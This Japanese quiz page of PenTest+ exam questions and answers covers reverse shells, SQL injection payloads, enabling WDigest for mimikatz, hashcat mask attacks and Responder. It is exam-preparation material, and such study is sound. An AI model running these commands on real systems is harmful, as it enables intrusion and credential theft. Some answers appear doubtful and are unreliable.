PenTest+(6)

PenTest+(6)
29問 • 4年前
  • なおき
  • 通報

    問題一覧

  • 1

    工場のコントロールとPLCがあるネットワークのPCに正式なアカウントを得ました。悪用する脆弱性はどれですか。

    MODBUS

  • 2

    NDAはいつ締結しますか。

    テスト前

  • 3

    b11b6948805f797bf2a82807973b891f のハッシュ値が表すのはどれですか。

    NTLM

  • 4

    ペネトレーションテスターは営業部員をフィッシングすることでテレワーク用のVPNアクセスを達成しました。その後パソコンに侵入し資格情報のハッシュを取得し辞書攻撃で簡単にパスワードがわかりました。判明したリスクに対する対策として適切なものはどれですか。(3つ選択)

    パスワードの複雑さの要件を設定する, リモートアクセス用に2要素認証を設定する, 全ての従業員にセキュリティ教育を実施する

  • 5

    次の不正なコードは何を実行するためのものですか。 python -c 'import pty; pty.spawn(""/usr/bin/bash"")'

    バックドア作成

  • 6

    ネットワークの外部と内部の両方の脆弱性について診断を依頼する際に、事前にいくつかの情報を提供する他に、 ベンダー自身が探索することを許可しています。このようなペネトレーションテストのタイプとしては次のどれが適切ですか。

    グレーボックステスト

  • 7

    nmapの調査結果と受け取った資料とではネットワークリソースに異なる部分があったのはなぜですか。(2つ選択)

    ネットワークリソースのアクセス権, アクセス制御

  • 8

    ワイヤレスのペネトレーションテストを行う際に、ペネトレーションテストのスコープを決定する上で必要な情報はどれですか。

    物理的なロケーションとテスト対象のネットワークのESS ID

  • 9

    SETで構築したサイトにメールで誘導してCEOからパスワードを盗むのはどれですか

    APT

  • 10

    次のHTTPリクエストペイロードの一部を見て、対応する脆弱性と対策はどれですか。 HTTPリクエストペイロードの一部 item=widget'+convert(int @@version)+'

    SQLインジェクション(エラー)、プリペアードクエリ

  • 11

    次のプログラム文中の①の部分に最もふさわしいのはどれですか。 ① import SYS ② def port_scan(p): ③ if __name__ == '__main__': ④

    #!/usr/bin/python

  • 12

    Webサイトの証明書が期限切れになったため更新します。最初に行う作業はどれですか。

    CSR申請を行う

  • 13

    Windows10でmimikatzを使えるようにするためレジストリ変更する構文はどれですか。

    /HKLM/SYSTEM/CurrentControlSet/Control/SecurityProviders/WDigest UseLogonCredential /d 1

  • 14

    IPアドレスのリストを使ってnmapのOSバージョンを表示するコマンドのオプションはどれですか。

    -O -iL

  • 15

    ネットワークのLLMNRの認証情報を得るためにMITMで使うコマンドはどれですか。

    responder

  • 16

    hashcatでNTML2ハッシュをマスク攻撃を使用して解析するコマンドのオプションはどれですか。

    -m 5600 hash.list -a 3 ?a?a?a?a

  • 17

    複数の企業の機密情報を収集しているのはどれですか。

    APTアタッカー

  • 18

    Javaバイトコードをスタティック解析します。最初に行うことはどれですか。

    デコンパイル

  • 19

    複数のコンテナに影響が出るのはどれですか。

    コンテナエクスプロイト

  • 20

    ペネトレーションテスターが内部ホストへの侵入に成功した後に、内部ホストからペネトレーションテスターの端末(targetip)につなぐリバースシェルを作成する手法として適切なのはどれですか。

    bash -i >& /dev/tcp/targetip/443 0>&1

  • 21

    アプリケーションがXMLを解析する際、脆弱性をテストするために、特別なXMLファイルを作ります。そのために次のどの情報が必要ですか。

    XSDファイル

  • 22

    次のHTTPリクエストペイロードの一部を見て、対応する脆弱性と対策はどれですか。 HTTPリクエストペイロードの一部 item=widget%20union%20select%20null,null,@@version--'

    SQLインジェクション(union)、プリペアードクエリ

  • 23

    ペネトレーションテスターは、ドメインコントローラーへのシェルを使用して、30日間ドメインに認証されていないユーザーアカウントを検出したいと考えています。これを達成するのに最適なコマンドはどれですか。

    dsquery user -inactive 4

  • 24

    安全なWebサイトを運用する上で、適切なセキュリティ対策をとる必要があります。次に示すWebサーバーのhtmlページのソースの一部から、セキュリティ上で最も問題がある行はどこですか。

    <!-- input type=""hidden"" name=""password"" value=""password"" -->

  • 25

    ペネトレーションテストに関与するステークホルダーのうち最も重要なのはだれですか。(2つ選択)

    情報システム部門, 経営層

  • 26

    エンゲージメントの終わりに行った chkconfig --delの意味はどれですか。

    永続性の削除

  • 27

    物理的な場所とESSIDが記録されているのはどれですか。

    SOW

  • 28

    ペンテスターがコードを解析する場合に行うことはどれですか。

    動的解析

  • 29

    インサイダー脅威となる可能性があるのはだれですか。

    やめた人

  • AZ-104(5)

    AZ-104(5)

    なおき · 24問 · 3年前

    AZ-104(5)

    AZ-104(5)

    24問 • 3年前
    なおき

    PenTest+(8)

    PenTest+(8)

    なおき · 32問 · 4年前

    PenTest+(8)

    PenTest+(8)

    32問 • 4年前
    なおき

    AZ-104(3)

    AZ-104(3)

    なおき · 26問 · 3年前

    AZ-104(3)

    AZ-104(3)

    26問 • 3年前
    なおき

    CIS-ITSM-2

    CIS-ITSM-2

    なおき · 42問 · 5年前

    CIS-ITSM-2

    CIS-ITSM-2

    42問 • 5年前
    なおき

    AZ-104(10)

    AZ-104(10)

    なおき · 23問 · 3年前

    AZ-104(10)

    AZ-104(10)

    23問 • 3年前
    なおき

    AZ-104(1)

    AZ-104(1)

    なおき · 20問 · 3年前

    AZ-104(1)

    AZ-104(1)

    20問 • 3年前
    なおき

    CIS-ITSM-12

    CIS-ITSM-12

    なおき · 46問 · 4年前

    CIS-ITSM-12

    CIS-ITSM-12

    46問 • 4年前
    なおき

    AZ-104(8)

    AZ-104(8)

    なおき · 19問 · 3年前

    AZ-104(8)

    AZ-104(8)

    19問 • 3年前
    なおき

    CBAS

    CBAS

    なおき · 19問 · 3年前

    CBAS

    CBAS

    19問 • 3年前
    なおき

    AZ-104(7)

    AZ-104(7)

    なおき · 20問 · 3年前

    AZ-104(7)

    AZ-104(7)

    20問 • 3年前
    なおき

    AZ-104(6)

    AZ-104(6)

    なおき · 25問 · 3年前

    AZ-104(6)

    AZ-104(6)

    25問 • 3年前
    なおき

    CIS-ITSM-13

    CIS-ITSM-13

    なおき · 21問 · 4年前

    CIS-ITSM-13

    CIS-ITSM-13

    21問 • 4年前
    なおき

    CIS-ITSM-1

    CIS-ITSM-1

    なおき · 37問 · 5年前

    CIS-ITSM-1

    CIS-ITSM-1

    37問 • 5年前
    なおき

    PenTest+(7)

    PenTest+(7)

    なおき · 30問 · 4年前

    PenTest+(7)

    PenTest+(7)

    30問 • 4年前
    なおき

    AZ-104(9)

    AZ-104(9)

    なおき · 25問 · 3年前

    AZ-104(9)

    AZ-104(9)

    25問 • 3年前
    なおき

    AZ-104(2)

    AZ-104(2)

    なおき · 23問 · 3年前

    AZ-104(2)

    AZ-104(2)

    23問 • 3年前
    なおき

    AZ-104(4)

    AZ-104(4)

    なおき · 23問 · 3年前

    AZ-104(4)

    AZ-104(4)

    23問 • 3年前
    なおき

    Data-01

    Data-01

    なおき · 36問 · 2年前

    Data-01

    Data-01

    36問 • 2年前
    なおき

    Data-02

    Data-02

    なおき · 52問 · 2年前

    Data-02

    Data-02

    52問 • 2年前
    なおき

    Data-03

    Data-03

    なおき · 19問 · 2年前

    Data-03

    Data-03

    19問 • 2年前
    なおき

    Data-04

    Data-04

    なおき · 50問 · 2年前

    Data-04

    Data-04

    50問 • 2年前
    なおき

    Data-05

    Data-05

    なおき · 39問 · 2年前

    Data-05

    Data-05

    39問 • 2年前
    なおき

    DATA-001

    DATA-001

    なおき · 30問 · 2年前

    DATA-001

    DATA-001

    30問 • 2年前
    なおき

    DATA-002

    DATA-002

    なおき · 49問 · 2年前

    DATA-002

    DATA-002

    49問 • 2年前
    なおき

    DATA-003

    DATA-003

    なおき · 37問 · 2年前

    DATA-003

    DATA-003

    37問 • 2年前
    なおき

    AZ104(1)

    AZ104(1)

    なおき · 4回閲覧 · 54問 · 2年前

    AZ104(1)

    AZ104(1)

    4回閲覧 • 54問 • 2年前
    なおき

    comptia project+_001

    comptia project+_001

    なおき · 10問 · 2年前

    comptia project+_001

    comptia project+_001

    10問 • 2年前
    なおき

    フレーズ

    フレーズ

    なおき · 21問 · 8ヶ月前

    フレーズ

    フレーズ

    21問 • 8ヶ月前
    なおき

    問題一覧

  • 1

    工場のコントロールとPLCがあるネットワークのPCに正式なアカウントを得ました。悪用する脆弱性はどれですか。

    MODBUS

  • 2

    NDAはいつ締結しますか。

    テスト前

  • 3

    b11b6948805f797bf2a82807973b891f のハッシュ値が表すのはどれですか。

    NTLM

  • 4

    ペネトレーションテスターは営業部員をフィッシングすることでテレワーク用のVPNアクセスを達成しました。その後パソコンに侵入し資格情報のハッシュを取得し辞書攻撃で簡単にパスワードがわかりました。判明したリスクに対する対策として適切なものはどれですか。(3つ選択)

    パスワードの複雑さの要件を設定する, リモートアクセス用に2要素認証を設定する, 全ての従業員にセキュリティ教育を実施する

  • 5

    次の不正なコードは何を実行するためのものですか。 python -c 'import pty; pty.spawn(""/usr/bin/bash"")'

    バックドア作成

  • 6

    ネットワークの外部と内部の両方の脆弱性について診断を依頼する際に、事前にいくつかの情報を提供する他に、 ベンダー自身が探索することを許可しています。このようなペネトレーションテストのタイプとしては次のどれが適切ですか。

    グレーボックステスト

  • 7

    nmapの調査結果と受け取った資料とではネットワークリソースに異なる部分があったのはなぜですか。(2つ選択)

    ネットワークリソースのアクセス権, アクセス制御

  • 8

    ワイヤレスのペネトレーションテストを行う際に、ペネトレーションテストのスコープを決定する上で必要な情報はどれですか。

    物理的なロケーションとテスト対象のネットワークのESS ID

  • 9

    SETで構築したサイトにメールで誘導してCEOからパスワードを盗むのはどれですか

    APT

  • 10

    次のHTTPリクエストペイロードの一部を見て、対応する脆弱性と対策はどれですか。 HTTPリクエストペイロードの一部 item=widget'+convert(int @@version)+'

    SQLインジェクション(エラー)、プリペアードクエリ

  • 11

    次のプログラム文中の①の部分に最もふさわしいのはどれですか。 ① import SYS ② def port_scan(p): ③ if __name__ == '__main__': ④

    #!/usr/bin/python

  • 12

    Webサイトの証明書が期限切れになったため更新します。最初に行う作業はどれですか。

    CSR申請を行う

  • 13

    Windows10でmimikatzを使えるようにするためレジストリ変更する構文はどれですか。

    /HKLM/SYSTEM/CurrentControlSet/Control/SecurityProviders/WDigest UseLogonCredential /d 1

  • 14

    IPアドレスのリストを使ってnmapのOSバージョンを表示するコマンドのオプションはどれですか。

    -O -iL

  • 15

    ネットワークのLLMNRの認証情報を得るためにMITMで使うコマンドはどれですか。

    responder

  • 16

    hashcatでNTML2ハッシュをマスク攻撃を使用して解析するコマンドのオプションはどれですか。

    -m 5600 hash.list -a 3 ?a?a?a?a

  • 17

    複数の企業の機密情報を収集しているのはどれですか。

    APTアタッカー

  • 18

    Javaバイトコードをスタティック解析します。最初に行うことはどれですか。

    デコンパイル

  • 19

    複数のコンテナに影響が出るのはどれですか。

    コンテナエクスプロイト

  • 20

    ペネトレーションテスターが内部ホストへの侵入に成功した後に、内部ホストからペネトレーションテスターの端末(targetip)につなぐリバースシェルを作成する手法として適切なのはどれですか。

    bash -i >& /dev/tcp/targetip/443 0>&1

  • 21

    アプリケーションがXMLを解析する際、脆弱性をテストするために、特別なXMLファイルを作ります。そのために次のどの情報が必要ですか。

    XSDファイル

  • 22

    次のHTTPリクエストペイロードの一部を見て、対応する脆弱性と対策はどれですか。 HTTPリクエストペイロードの一部 item=widget%20union%20select%20null,null,@@version--'

    SQLインジェクション(union)、プリペアードクエリ

  • 23

    ペネトレーションテスターは、ドメインコントローラーへのシェルを使用して、30日間ドメインに認証されていないユーザーアカウントを検出したいと考えています。これを達成するのに最適なコマンドはどれですか。

    dsquery user -inactive 4

  • 24

    安全なWebサイトを運用する上で、適切なセキュリティ対策をとる必要があります。次に示すWebサーバーのhtmlページのソースの一部から、セキュリティ上で最も問題がある行はどこですか。

    <!-- input type=""hidden"" name=""password"" value=""password"" -->

  • 25

    ペネトレーションテストに関与するステークホルダーのうち最も重要なのはだれですか。(2つ選択)

    情報システム部門, 経営層

  • 26

    エンゲージメントの終わりに行った chkconfig --delの意味はどれですか。

    永続性の削除

  • 27

    物理的な場所とESSIDが記録されているのはどれですか。

    SOW

  • 28

    ペンテスターがコードを解析する場合に行うことはどれですか。

    動的解析

  • 29

    インサイダー脅威となる可能性があるのはだれですか。

    やめた人